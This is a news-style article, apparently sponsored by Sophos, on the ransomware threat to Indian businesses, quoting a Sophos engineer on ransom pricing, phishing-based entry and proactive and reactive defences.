Criminal gangs have been using ransomware to attack businesses for over three decades. The first recorded attack was against a hospital and executed by distributing infected floppy disks. Today, email is the main attack vector with ransomware families such as Doppelpaymer, REvil, Clop, DarkSide, Netwalker, Ragnar Locker, Conti and REVil able to encrypt data and, in some cases, exfiltrate that data first.\nThe goal here is always the same. The criminals executing these attacks are motivated by money. They want you to either pay for decryption keys to retrieve your data \u2013 two-thirds of the companies hit with ransomware in India paid the ransom last year according to the recent Sophos State of Ransomware report \u2013 or pay to prevent stolen data being made public.\nThe problem is not going away. Data from India\u2019s National Crime Records Bureau reveals that the number of attacks doubled between 2018 and 2019 with no sign of relenting. According to Sophos\u2019 data, 82% of businesses were hit with ransomware attacks in 2020. It doesn\u2019t matter whether the business is large or small \u2013 everyone is a potential target.\nAaron Bugal, the Global Solutions Engineer at Sophos, says, \u201cRansomware doesn\u2019t discriminate -\nevery organisation is a target, regardless of size, sector, or geography. And the ransom amounts are not fixed. Attackers vary them based on what they believe the victim can pay.\u201d The ransomware groups set the ransom price based on what they think the victim can pay. The group behind the WastedLocker ransomware analysed its targets and set ransoms according to the size and scale of the organisation. While some received demands for US$500,000, others faced a whopping US$10M to regain access to their data.\u00a0\n\u201cThe take-away here is that the ransom demands businesses are receiving are most likely attributed to information the attacker has been able to steal, analyse and use to evaluate your target worth,\u201d says Mr Bugal.\nBut not all attackers are looking for huge paydays using sophisticated tools.\n\u201cAt the other end of the scale is your more fast-food variety of ransomware such as Dharma, which forms the basis of ransomware-as-as-service operations,\u201d says My Bugal. \u201cLess sophisticated cybercriminal outfits can purchase malware on the dark web and go after small- to medium-sized businesses. Ransom demands using Dharma average around US$8,000, which is still considerable for many smaller organisations.\u201d\nThe most common attack vector used by ransomware gangs is email. In order to craft an email with the greatest chance of tricking someone to open a malicious attachment, click a link to a malware-laden website or provide log-in credentials, the criminals use public resources of information such as search engines, social media, open-source intelligence tools and previously exposed data dumps to determine an easy method to break into an environment.\n\u201cOnce they\u2019re inside, the attackers use native tools like Powershell, Windows Management Instrumentation Commandline (WMIC), Certutil and others to maintain persistence, elevate privileges and laterally move onto other internal systems. Once they\u2019ve got the lay of the land, they get a little more brazen and start stealing corporate information and turning to the use of more aggressive and destructive tools.\u201d\nMinimising the risk of an attack requires both a proactive and reactive strategy.\n\u201cEmploying proactive security with 24\/7 monitoring with automated software and threat hunting experts is key to quickly and effectively identifying, investigating, and mitigating anomalous behavior,\u201d says My Bugal. \u201cServices such as Sophos Managed Threat Response combine the best tools with the most experienced threat hunters to help identify and neutralise active threats, limit recurrence, and minimise the chance of ransomware taking hold of your business assets.\u201d\nThis needs to be supported by staff education so your people can identify suspicious email and applications and report them quickly and easily.\nIf an attacker manages to bypass the proactive controls you have in place, then you need to contain and neutralise the attack. Once you have stopped the spread, assess the damage.\n\u201cAssess what data has been lost, which endpoints, servers and operating systems were affected and whether your backups are still intact or if the attacker has deleted them. If they are intact, make an offline copy immediately. And look for machines that were protected as they\u2019ll be critical in getting you back on your feet,\u201d says My Bugal.\nYou may also need to engage a third party, such as Sophos Rapid Response, for specialist incident response to neutralise an active attack and conduct post incident analysis to access what happened and help you mitigate future attacks.\nRansomware costs Indian businesses millions of dollars and causes massive business disruption. By taking proactive and reactive steps, it\u2019s possible to break the criminals\u2019 business cycle. By making it harder for them to receive the financial rewards they crave, you can protect your business and remove the incentive for them to attack.